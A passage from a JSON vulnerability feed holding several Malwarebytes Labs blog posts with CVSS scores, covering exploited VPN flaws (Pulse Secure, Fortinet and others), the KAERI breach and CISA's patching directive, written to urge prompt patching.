vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-16T14:59:38", "type": "malwarebytes", "title": "Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T14:59:38", "id": "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-06-21T14:31:54", "description": "Remember when we told you to patch your VPNs already? I hate to say &quot;I told you so&quot;, but I informed you thusly.\n\nAccording to South Korean officials a North Korean cyber-espionage group managed to infiltrate the network of South Korea&#x27;s state-run nuclear research institute last month.\n\n### The crime: time and place\n\nCybersecurity news hounds The Record report that a spokesperson for the Korea Atomic Energy Research Institute (KAERI) said [the intrusion took place last month](<https://therecord.media/north-korean-hackers-breach-south-koreas-atomic-research-agency-through-vpn-bug/>), on May 14 to be exact, through a vulnerability in a virtual private network (VPN) server. Since its establishment in 1959, KAERI has been the only research institute in Korea dedicated to nuclear energy. Reportedly, thirteen unauthorized IP addresses accessed KAERI\u2019s internal network.\n\n### The suspect: Kimsuky\n\nSome of the addresses could be traced back to the APT group called Kimsuky. One of the IP addresses was used in an attack that targeted COVID-19 vaccine developers in South Korea last year.\n\nNorth Korean cyber-attacks on its southern neighbor are not uncommon. And Kimsuky is the APT that is best known for these attacks. The Kimsuky APT is a North Korean threat actor that has been active since 2012 and targets government entities mainly in South Korea. Recently, we reported about [this group using the AppleSeed backdoor](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) against the Ministry of Foreign Affairs of South Korea.\n\n### The victim: KAERI\n\nKAERI is a national research institute which was instrumental in developing nuclear technology for power generation and industrial applications. And while North Korea is ahead of South Korea in some nuclear fields\u2014notably nuclear weapons\u2014it is thought to be weaker than its neighbor when it comes to energy generation. As we stated in our earlier [report](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) one of the other targets was the nuclear security officer for the International Atomic Energy Agency (IAEA), a UN organization tasked with nuclear regulations and cooperation.\n\n### The weapon: a VPN vulnerability\n\nIn a [statement](<https://translate.google.com/translate?sl=auto&tl=en&u=https://www.kaeri.re.kr/board/view?menuId%3DMENU00326%26linkId%3D9181>), KAERI says that an unidentified outsider accessed parts of its system using weaknesses in its virtual private network (VPN). It also states that the attackers&#x27; IP addresses was blocked, and its system upgraded, when it found out about the attack, on May 31. \n\nThe name of the VPN vendor is being kept secret. Although we can&#x27;t rule out a zero-day, that fact that this wasn&#x27;t mentioned, and that the system was updated in response, suggests it wasn&#x27;t. It certainly doesn&#x27;t need to be, and there are a lot of known vulnerabilities in the running. Many of them are years old, and many are known to be used in the wild. Even though patches are available, the application of these patches has taken some organizations quite some time. \n\nWe also wrote recently about vulnerabilities in the [Pulse Secure VPN](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>). Pulse issued a final patch on May 3 for a set of vulnerabilities that were used in the wild.\n\nThe NSA also issued an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) in April about five publicly known vulnerabilities being exploited by the Russian Foreign Intelligence Service (SVR). The CVE numbers used to identify vulnerabilities start with year the CVE was issued. What&#x27;s most striking about the NSA&#x27;s list is just how old most of the vulnerabilities on it are.\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) Fortinet FortiGate VPN\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) Synacor Zimbra Collaboration Suite\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) Pulse Secure Pulse Connect Secure VPN\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) Citrix Application Delivery Controller and Gateway\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) VMware Workspace ONE Access\n\nAs you can see, most of them are VPNs and other networking-related applications. By design a VPN is remotely accessible, which makes it a target that attackers can reach from anywhere. A VPN or gateway is always a likely target, especially if it has a known vulnerability. And a seasoned APT group, like Kimsuky, will have fewer problems reverse-engineering patches than your everyday cybercriminal.\n\n### Patching or lack thereof\n\nThe risky strategy of little-to-no-patching stands a good chance of going horribly wrong. A [Forbes study](<https://www.forbes.com/sites/taylorarmerding/2019/06/06/report-if-you-dont-patch-you-will-pay>) of 340 security professionals in 2019 found 27% of organizations worldwide, and 34% in Europe, said they\u2019d experienced breaches due to unpatched vulnerabilities. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nStay safe, everyone!\n\nThe post [Atomic research institute breached via VPN vulnerability](<https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-21T13:53:03", "type": "malwarebytes", "title": "Atomic research institute breached via VPN vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-21T13:53:03", "id": "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "href": "https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-11-04T22:43:41", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has issued binding directive 22-01 titled [Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities>). This directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third-parties on an agency\u2019s behalf.\n\nOne of the most welcomed of the required actions set forth in the directive is that CISA will keep a [catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) of vulnerabilities alongside timeframes in which they must be remediated. According to the plan, this catalog will list only the most important vulnerabilities that have proven to pose the biggest risks.\n\n### The scope\n\nIn the US, a binding operational directive is an instruction that federal, executive branch, departments and agencies have to follow. They also provide a strong indication of the kind of cybersecurity measures that CISA thinks are important, which other organizations may wish to follow. (It&#x27;s also easy to imagine that what&#x27;s required of federal agencies today may be required of the vast web of suppliers to federal agencies tomorrow.)\n\nTo that end, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments review and monitor its catalog. CISA has done the hard work of identifying what should be patched first, and anyone who follows its guidance is likely to find their security and resilience posture improved.\n\n### The reason\n\nIt will come as no surprise that the continued cyberattacks against US entities are the reason for this directive: &quot;The United States faces persistent and increasingly sophisticated malicious cyber campaigns that threaten the public sector, the private sector, and ultimately the American people\u2019s security and privacy.\u201d\n\nMany of the attacks against US organizations rely on vulnerabilities that could have been patched months or even years ago, but haven&#x27;t been. For example, earlier this year CISA issued a joint advisory with the FBI and NSA urging US organizations to patch [five old vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) from 2018 and 2019 that were regularly exploited by the Russian Foreign Intelligence Service.\n\nThe idea is that better patch management, supported by the prioritization provided by the CISA catalog, can prevent future attacks.\n\n### The rules\n\nThe required actions are pretty simple and straightforward\u2014to read at least. Execution of the rules may prove to be more difficult. The rules are:\n\n * **Plan**. Organizations have 60 days to come up with a vulnerability management plan.\n * **Execute**. CISA is giving notice that the clock is running on vulnerabilities it cares about. The affected departments and agencies have six months to fix anything with a CVE issued before 2021, and two weeks to fix everything else.\n * **Report**. Organizations have to report on the status of vulnerabilities through the Continuous Diagnostics and Mitigation (CDM) Federal Dashboard.\n\nWhile 6 months may seem a long time for the CVE\u2019s prior to 2021, that doesn\u2019t mean they are less important than this year&#x27;s vulnerabilities. The grace period may reflect the difficulty that organizations have already had in fixing older bugs, or the fact that &quot;everything prior to 2021&quot; is just a much longer period of time than the ten months of 2021. After six months is up and all those vulnerabilities are fixed, presumably everyone will be on a much shorter lease, with just two weeks to fix anything CISA deems serious enough to put on its list.\n\nIn some cases the catalog already lists a vulnerability with a due date in the past, such as [CVE-2019-11510](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>). In August, 2019, scans performed by Bad Packets found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510, four months after a patch became avaiable. Over 5,000 of those were in the US, including military, federal, state, and local government agencies\u2014and this was after advisories have been issued by the NSA and the NCSC.\n\nThe notes column for this CVE references [CISA&#x27;s ED 21-03](<https://cyber.dhs.gov/ed/21-03/>) for further guidance and requirements. In that Emergency Directive you will find the due date of April 23rd of 2021. So, it was already required to be patched for organizations that are bound to follow emergency directives.\n\n### Patch management\n\nBecause patch management has proven to be a challenge, having a catalog to fall back on when you are looking for prioritization rules can be very helpful. On the other hand, by telling organizations what needs to be done, inadvertently they may skip necessary patches, simply because they were not listed. Or worse, they were listed but the people responsible for patching didn\u2019t find them.\n\nEither way, if this is a first step in setting up a compliance program, where all the vulnerabilities that are used in the wild get patched within two weeks we will certainly welcome it. We have seen the impact of, for example, the [disclosure rules](<https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html>) set forth by Google\u2019s Project Zero on the generally accepted rules for [responsible](<https://en.wikipedia.org/wiki/Responsible_disclosure>)[ disclosure](<https://en.wikipedia.org/wiki/Responsible_disclosure>), and would love to see this directive have a similar effect on the average patching speed.\n\nStay safe, everyone!\n\nThe post [CISA sets two week window for patching serious vulnerabilities](<https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-04T21:23:02", "type": "malwarebytes", "title": "CISA sets two week window for patching serious vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-11-04T21:23:02", "id": "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "href": "https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T17:31:38", "description": "In April 2019, Pulse Secure published an advisory about a vulnerability in their software. In August, cybercriminals were massively scanning for systems that were running a vulnerable version. Now it\u2019s October, and still many organizations have not applied the patches that are available for this vulnerability. \n\nThis is a trend we've seen repeated with dozens of other publicly-known vulnerabilities and organizations that are slow to update software to the latest, most secure versions. \n\nWith so many organizations falling victim to cyberattack via exploited vulnerability, we have to ask: Why aren't people patching?\n\n### What are the vulnerabilities?\n\nReading the above, you might suspect that the vulnerabilities were not serious or hard to exploit. But that's not the impression we get from the Pulse Secure advisory. It states:\n\n> \u201cMultiple vulnerabilities were discovered and have been resolved in Pulse Connect Secure (PCS) and Pulse Policy Secure (PPS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform a remote arbitrary file access on the Pulse Connect Secure gateway. This advisory also includes a remote code execution vulnerability that can allow an authenticated administrator to perform remote code execution on Pulse Connect Secure and Pulse Policy Secure gateways.\u201d\n\nPulse Connect Secure is a VPN solution for organizations and offers remote users a secure connection to the corporate network so they can remotely log in and work. Pulse Policy Secure is a well-known Network Access Control solution, which does not only control who can connect but also assigns the appropriate permissions.\n\nWhen it comes to software like this, an authentication by-pass vulnerability is a serious problem. Any criminal with the proper knowledge can pretend to be an employee and access company resources. In this case, https access and the use of an especially-prepared URL would be enough to read an arbitrary file on a vulnerable system.\n\nNeedless to say, that is a serious problem\u2014and we haven\u2019t even touched on the remote code execution possibility. Every hacker's dream is to be able to run their code on your system. That gives them a foothold within your network from which they can expand their activities. They can plant ransomware or whatever else they fancy.\n\n### Where would they get the necessary knowledge\n\nBy design, many cybercriminals are opportunistic, and they will jump at any easy copy-and-paste job that renders enough cash. So, when the vulnerability was discussed elaborately at Black Hat in early August, the method to exploit the vulnerability became general knowledge. \n\nSince using this method hardly requires expert knowledge, researchers soon noticed a lot of scanning activity by cybercriminals looking for vulnerable systems. The vulnerability in Pulse Secure was presented along with a [few vulnerabilities in other SSL VPN products](<https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545>). Shortly after, an exploit for this vulnerability was published on GitHub, so every copycat could have it handy.\n\n### Unpatched\n\nOn Saturday, August 24, 2019, scans performed by [Bad Packets](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510. Over 5,000 of those were in the US, including military, federal, state, and local government agencies. \n\nA week later, 10,471 Pulse Secure VPN servers worldwide remained vulnerable to compromise. On Monday, September 16, 2019, there were still 7,712 left to be patched. On Monday, October 7, 2019, a surprising 6,018 remained, with a lot of active scanning going on\u2014and this was after advisories have been issued by the NSA and the NCSC.\n\n### Responsibility\n\nA basic question in cases like these is: Who is responsible for applying patches? Without doubt, we expect a vendor to develop a patch as soon as the vulnerability is made known to them, but what happens after that? \n\nIndustry leaders have long warned that vulnerability remediation and effective patch management are essential to keep organizations safe from cyberattacks. But there are a few essential steps in the delivery chain after the patch is released:\n\n * Customers need to be made aware of the patch and the required urgency.\n * Security providers or resellers need to make sure their customers are aware of the existence of the patch and the possible consequences of not applying it.\n * Organizations need to have a department or external provider that is responsible for keeping the security software updated. Spending money on top-notch software and then leaving it unattended is a sure waste of money. Keeping software in shape is not limited to applying patches, but security patches can sometimes be more important than fetching the latest rules update.\n\nThe natural next question, then, is why aren't organizations applying patches as soon as they know about them? \n\n* * *\n\n_Recommended reading: _[Tackling the shortage in skilled IT staff: whole team security](<https://blog.malwarebytes.com/security-world/business-security-world/2019/02/tackling-the-shortage-in-skilled-it-staff-whole-team-security/>)\n\n* * *\n\n### So, what\u2019s stopping them from applying the patch?\n\nAssuming that an organization's IT or security team is aware of the patch, possible reasons for holding off might be fear of disrupted processes or a possible disagreement on what they might regard as critical. But the possible consequences of an unpatched critical vulnerability should heavily outweigh those concerns. \n\nThere could be several other reasons for not applying patches as soon as they are available:\n\n * Understaffed IT and security teams \n * Looking into the consequences first, which could slow down the process due to lack of feedback\n * Waiting for others to share their experiences before applying patches \n * Unaware of the patch's existence, sometimes as a result of not having time to follow up on emails and warning signs\n * Lack of a point of contact. Whose problem is it? And whose job is to solve it?\n\nAs you can see, most of these can be traced back to a lack of staff and time, and sometimes funding is responsible for those two shortages. But sometimes understaffing is because of [other reasons.](<https://blog.malwarebytes.com/security-world/2018/06/whats-causing-the-cybersecurity-skills-gap/>) And once you are understaffed, the lack of time to follow up on problems comes as a logical consequence.\n\n### The Pulse vulnerability is not alone\n\nIt\u2019s not like the Pulse vulnerability is the only VPN-related vulnerability out there (or any software vulnerability, for that matter). Similar problems are known to exist in products from Fortinet and Palo Alto. \n\nIn an [advisory](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) from the National Cyber Security Center (NCSC) in the UK, users of the affected VPN products can find specified log entries to look for signs of a compromise or attempt to compromise. They also emphasize the need for patching: \n\n> \u201cSecurity patches should always be applied promptly. More guidance is available on the NCSC website. The NCSC acknowledges that patching is not always straightforward and in some cases can cause business disruption, but it remains the single most important step an organisation or individual can take to protect itself.\u201d\n\nSo, the question remains: If organizations are aware of the patch and have the staff resources to apply it, why are so many dragging their feet? Maybe some of our readers can shed some light on this mystery. Feel free to share your personal experiences in the comments. \n\nThe post [Pulse VPN patched their vulnerability, but businesses are trailing behind](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-10-18T16:36:36", "type": "malwarebytes", "title": "Pulse VPN patched their vulnerability, but businesses are trailing behind", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2019-10-18T16:36:36", "id": "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "href": "https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-09T16:34:58", "description": "A threat actor has leaked a list of almost 500,000 Fortinet VPN credentials, stolen from 87,000 vulnerable FortiGate SSL-VPN devices. The breach list provides raw access to organizations in 74 countries, including the USA, India, Taiwan, Italy, France, and Israel, with almost 3,000 US entities affected.\n\nAccording to [Fortinet](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) the credentials were obtained from systems that remained unpatched against [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) at the time of the actor&#x27;s scan. **Even if the devices have since been patched, if the passwords were not reset, they remain vulnerable.**\n\n### CVE-2018-13379\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in question provides an improper limitation of a pathname to a restricted directory in several Fortinet FortiOS and FortiProxy versions. The vulnerable SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP requests. Apparently the FortiOS system files also contained login credentials.\n\nIn April, CVE-2018-13379 was mentioned in a joint [advisory](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) from the NSA, CISA, and the FBI as one of five vulnerabilities widely used in on-going attacks by the Russian Foreign Intelligence Service (SVR). A patch for the vulnerability has been available since May 2019, but this patch has not been applied as widely as necessary.\n\n### The threat actor\n\nThe source, and the websites that leaked the information, make for an interesting story as well. The list of Fortinet credentials was leaked by someone going by the handle &#x27;Orange.&#x27; Orange is also the administrator of the newly launched RAMP hacking forum, and a previous operator of the Babuk Ransomware operation.\n\nAfter the [announced retirement of the Babuk gang](<https://blog.malwarebytes.com/reports/2021/06/babuk-ransomware-builder-leaked-following-muddled-retirement/>), Orange apparently went his own way and started RAMP. Orange is now involved in the Groove ransomware operation, which allegedly employs several former Babuk developers. The leak of Fortinet VPN SSL credentials was mirrored on the Groove leak website. Both posts lead to a file hosted on a Tor storage server known to be used by the Groove gang.\n\nRansomware leak sites are used to create some extra leverage over victim organizations. The ransomware attackers steal data from the infiltrated system while they deploy their ransomware. They then threaten to publish the data if the victim decides not to pay. Depending on the kind of data, this can be a rather compelling reason to give in.\n\n### Vulnerable security software\n\nOrganizations use Virtual Private Networks (VPNs) to provide remote access to their systems from the Internet. By design a VPN is remotely accessible so employees can reach them from anywhere, which also means that attackers can reach them from anywhere. And since VPNs provide access to an organization&#x27;s soft underbelly, a VPN that has a known vulnerability represents a high value target that&#x27;s easy to reach.\n\nThat makes swift patching an absolute necessity, but many organizations find this difficult, in part because VPNs are so important for remote working. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nA leak of this type is serious since valid VPN credentials could allow threat actors to access a network to steal data, expand their access, and run ransomware or other malware.\n\nIn light of the leak, Fortinet is recommending companies to immediately disable all VPNs, upgrade the devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above, followed by initiating an organization-wide password reset, warning that you may remain vulnerable post-upgrade if your users&#x27; credentials were previously compromised.\n\nThe post [500,000 Fortinet VPN credentials exposed: Turn off, patch, reset passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/500000-fortinet-vpn-credentials-exposed-turn-off-patch-reset-passwords/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T15:37:43", "type": "malwarebytes", "title": "500,000 Fortinet VPN credentials exposed: Turn off, patch, reset passwords", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T15:37:43", "id": "MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/500000-fortinet-vpn-credentials-exposed-turn-off-patch-reset-passwords/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-05-04T12:27:56", "description": "Pulse Secure has [alerted customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>) to the existence of an exploitable chain of attack against its Pulse Connect Secure (PCS) appliances. PCS provides Virtual Private Network (VPN) facilities to businesses, which use them to prevent unauthorized access to their networks and services.\n\nCybersecurity sleuths Mandiant report that they are tracking &quot;12 malware families associated with the exploitation of Pulse Secure VPN devices&quot; operated by groups using a set of related techniques to bypass both single and multi-factor authentication. Most of the problems discovered by Pulse Secure and Mandiant involve three vulnerabilities that were patched in 2019 and 2020. But there is also a very serious new issue that it says impacts a very limited number of customers.\n\n### The old vulnerabilities\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The patched vulnerabilities are listed as:\n\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. We [wrote](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) about the apparent reluctance to patch for this vulnerability in 2019.\n * [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>) a vulnerability in the Pulse Connect Secure &lt; 9.1R8.2 admin web interface could allow an authenticated attacker to upload a custom template to perform an arbitrary code execution.\n * [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>) a vulnerability in the Pulse Connect Secure &lt; 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.\n\nThe obvious advice here is to review the Pulse advisories for these vulnerabilities and follow the recommended guidance, which includes changing all passwords in the environments that are impacted.\n\n### The new vulnerability\n\nThe new vulnerability (CVE-2021-22893) is a Remote Code Execution (RCE) vulnerability with a CVSS score of 10\u2014the maximum\u2014and a Critical rating. According to [the Pulse advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>):\n\n> [The vulnerability] includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. This vulnerability has a critical CVSS score and poses a significant risk to your deployment.\n\nThere is no patch for it yet (it is expected to be patched in early May), so system administrators will need to mitigate for the problem for now, rather than simply fixing it. Please don&#x27;t wait for the patch.\n\n### Mitigation requires a workaround\n\nAccording to Pulse Secure, until the patch is available CVE-2021-22893 can be mitigated by importing a workaround file. More details can be found in the company&#x27;s [Security Advisory 44784](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>). Reportedly, the workaround disables Pulse Collaboration, a feature that allows users to schedule and hold online meetings between both Connect Secure users and non-Connect Secure users. The workaround also disables the Windows File Share Browser that allows users to browse network file shares.\n\n### Targets\n\nThe Pulse Connect Secure vulnerabilities including CVE-2021-22893 have been used to target government, defense and financial organizations around the world, but mainly in the US. According to some articles the threat-actors are linked to China. The identified threat actors were found to be harvesting account credentials. Very likely in order to perform lateral movement within compromised organizations&#x27; environments. They have also observed threat actors deploying modified Pulse Connect Secure files and scripts in order to maintain persistence. These modified scripts on the Pulse Secure system are reported to have allowed the malware to survive software updates and factory resets.\n\n### Threat analysis\n\nFireEye&#x27;s Mandiant was involved in the research into these vulnerabilities. It has posted an elaborate analysis of the related malware, which they have dubbed SlowPulse. According to Mandiant, the malware and its variants are &quot;applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so&quot;. In their 